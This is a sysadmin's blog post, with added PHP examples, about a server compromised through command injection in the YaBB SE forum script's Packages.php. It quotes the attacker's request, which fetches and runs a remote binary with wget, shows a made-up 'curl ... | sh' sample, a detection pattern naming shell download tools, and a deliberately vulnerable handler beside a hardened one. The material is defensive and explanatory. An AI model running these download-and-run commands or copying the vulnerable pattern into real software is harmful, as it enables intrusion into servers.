In recent months I’ve attracted the attention of a hacker from Brazil, and until a few days ago this proved to be a real pain in the ass, especially as the exploit he was using doesn’t seem to be widely documented on the web.
Finally I managed to close the hole, but only after I had tried all of the following:
- shut down all non-essential services on RH 7.3
- shut down FTP
- reset all passwords
- removed GCC from my system, as the hacker was gaining access and compiling further C exploits
- almost had to change machines!
I was still getting compromised. At first I thought this bastard was just a bot that automatically detected a security hole and sent automated attacks. But recently, looking at his .bash_history, I realised I had a fairly persistent pest on my hands.
Anyway, the security hole ended up being quite simple; I wish I had discovered it earlier. It turns out one of my users was running the http://www.yabbse.org/ forum script, quite possibly one of the most insecure examples of professional PHP programming about. I present the details here in the hope they will help some people write more secure scripts.
The request that the hacker was using to compromise the server was the following:
[root@www logs]# cat access_log | grep spc1
184.108.40.206 - - [25/Oct/2003:16:43:42 -0700] "GET /fishbowl/Sources/Packages.php?%20wget%20http://brlink.net/db/spc1;%20chmod%20777%20spc1;%20./spc1 HTTP/1.1" 200 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
Put through a little urldecode, you get:
/var/tmp/.xpl; cd /var/tmp/.xpl; wget http://brlink.net/db/spc1; chmod 777 spc1; ./spc1
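A sweep over the whole access log, as an added example that is not part of the original post: it parses Apache combined-format lines, URL-decodes the query string the way the post does by hand, and reports only the requests where a shell separator (or the start of the query) is followed by a download-and-run command. The sample log lines embedded below are constructed for the example (the first is the request quoted above, the others are made up), and the list of command names is an assumption to extend for your own environment.

```php
<?php
// Added example, not part of the original post: sweep an Apache combined-format
// access_log for requests whose URL-decoded query string carries a shell
// separator followed by a download-and-run command, as in the request above.
// The command list and the sample log lines are assumptions constructed for
// this example.

// Separator (or start of query) followed by a command an intruder typically
// chains: ; | ` $( && and then wget, curl, chmod, sh ...
const SUSPICIOUS = '/(?:^|;|\||`|\$\(|&&)\s*(?:wget|curl|lynx|fetch|chmod|sh|bash|perl|nc|ftp)\b/i';

// Parse one combined-format line into the fields we care about.
// Returns null for lines that do not look like a request.
function parse_access_line(string $line): ?array
{
    // host ident user [time] "METHOD url PROTO" status bytes "referer" "agent"
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) /', $line, $m)) {
        return null;
    }
    $url   = $m[4];
    $qpos  = strpos($url, '?');
    $path  = $qpos === false ? $url : substr($url, 0, $qpos);
    $query = $qpos === false ? ''   : substr($url, $qpos + 1);
    return [
        'host'   => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $path,
        // urldecode() is the same transformation the post applied by hand;
        // it also turns '+' into a space, as the script's own $_GET would.
        'query'  => urldecode($query),
        'status' => (int)$m[5],
    ];
}

// Run every line through the parser and the pattern; return the hits.
function find_injection_attempts(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        $req = parse_access_line($line);
        if ($req === null || !preg_match(SUSPICIOUS, $req['query'])) {
            continue;
        }
        $hits[] = [
            'line'    => $i + 1,
            'host'    => $req['host'],
            'time'    => $req['time'],
            'script'  => $req['path'],
            'command' => $req['query'],
            // A 200 means the PHP script ran to completion, so the injected
            // command almost certainly executed as the web server user.
            'served'  => $req['status'] === 200,
        ];
    }
    return $hits;
}

// Constructed sample: line 1 is the request quoted in the post, line 2 is an
// ordinary YaBB SE-style URL (which also uses ';' as a separator, so ';' alone
// is not enough to flag), line 3 is a second, made-up attempt via a pipe.
$sample_log = [
    '184.108.40.206 - - [25/Oct/2003:16:43:42 -0700] "GET /fishbowl/Sources/Packages.php?%20wget%20http://brlink.net/db/spc1;%20chmod%20777%20spc1;%20./spc1 HTTP/1.1" 200 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"',
    '10.0.0.5 - - [25/Oct/2003:16:50:01 -0700] "GET /fishbowl/index.php?board=2;action=display;threadid=41 HTTP/1.1" 200 8831 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [26/Oct/2003:02:13:37 -0700] "GET /fishbowl/Sources/Packages.php?p=%7Ccurl%20http://203.0.113.7/a.sh%7Csh HTTP/1.0" 200 255 "-" "-"',
];

// Usage: php sweep.php [/var/log/httpd/access_log]; with no argument the
// constructed sample above is scanned (lines 1 and 3 are reported, line 2 is not).
$lines = isset($argv[1]) ? file($argv[1], FILE_IGNORE_NEW_LINES) : $sample_log;
foreach (find_injection_attempts($lines) as $h) {
    printf("line %d  %s  %s  %s  served=%s\n    %s\n",
        $h['line'], $h['host'], $h['time'], $h['script'],
        $h['served'] ? 'yes' : 'no', $h['command']);
}
```

Grepping for the one file name you already know about (spc1) only finds the visits you have already seen; matching on the decoded query catches the next payload under a different name, and the served flag tells you which of those requests the script actually answered.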
Check out the cat.txt; it’s an interesting idea. Looks like the yabbse script presented a nice exec() or system() call for anyone to do what they wanted with. I would estimate PHP programmers learn to treat these functions with caution within their first 3 months of exposure to the language, and that’s if they have no prior development experience. What’s strange is that yabbse, currently in version 1.5.4 with quite a professional website, let this *censored*up slip through.
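Not the YaBB SE code, which the post does not quote, but an added example of the pattern it describes: a handler in the shape of a package installer that pastes a request parameter straight into a shell command, beside a hardened form of the same handler. The parameter name, the tar command and the allowlist pattern are assumptions made for the example; the attack string is the decoded request from the log above.

```php
<?php
// Added example, not YaBB SE's own code: a minimal "install a package" handler
// in the shape the post describes, first as it must not be written and then
// hardened. The parameter name "package" and the tar command are assumptions.

// VULNERABLE: the request parameter is pasted straight into a shell command.
// On PHP 4.1 with register_globals on (the default before PHP 4.2), $package
// would not even need an explicit $_GET read; any ?package=... sets it.
function vulnerable_command(string $package): string
{
    // /bin/sh sees one string and splits it on ';', '|', '&&', '`' and '$(':
    // "x; wget http://h/spc1; chmod 777 spc1; ./spc1" becomes four commands,
    // all running as the web server user.
    return "tar -xzf Packages/$package";
}

// HARDENED: allowlist the shape of the value, then quote it anyway.
function hardened_command(string $package): string
{
    // 1. Positive validation: a plain file name, no slashes, no leading dot,
    //    no whitespace or metacharacters. Reject; do not try to "clean".
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\.tar\.gz$/', $package)) {
        throw new InvalidArgumentException("rejected package name: $package");
    }
    // 2. escapeshellarg() wraps the value in single quotes and escapes any
    //    embedded quote, so the shell receives exactly one argument. This is
    //    defence in depth for the day someone loosens step 1.
    return 'tar -xzf ' . escapeshellarg('Packages/' . $package);
}

// Before running either command for real, the caller should also confirm the
// file exists under Packages/ (is_file + realpath) and, better still, avoid the
// shell entirely: PharData can unpack a .tar.gz from PHP with no system() call.

$inputs = [
    'yabbse-1.5.4.tar.gz',                                                        // legitimate
    '/var/tmp/.xpl; cd /var/tmp/.xpl; wget http://brlink.net/db/spc1; chmod 777 spc1; ./spc1', // the attack
    '../../etc/passwd',                                                           // traversal, also rejected
];

foreach ($inputs as $in) {
    echo "input:      $in\n";
    echo "vulnerable: " . vulnerable_command($in) . "\n";
    try {
        echo "hardened:   " . hardened_command($in) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "hardened:   " . $e->getMessage() . "\n";
    }
    echo "\n";
}
```

The vulnerable function hands the attack string to the shell as five commands; the hardened one never lets it past the allowlist, and even a value that did pass would reach tar as a single quoted argument. Removing GCC, as the post tried, does not help here: the injected command fetches a prebuilt binary with wget, so the fix has to be in the script that builds the command.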
Many thanks to Nick Rembis who pointed me in the right direction to closing this hole.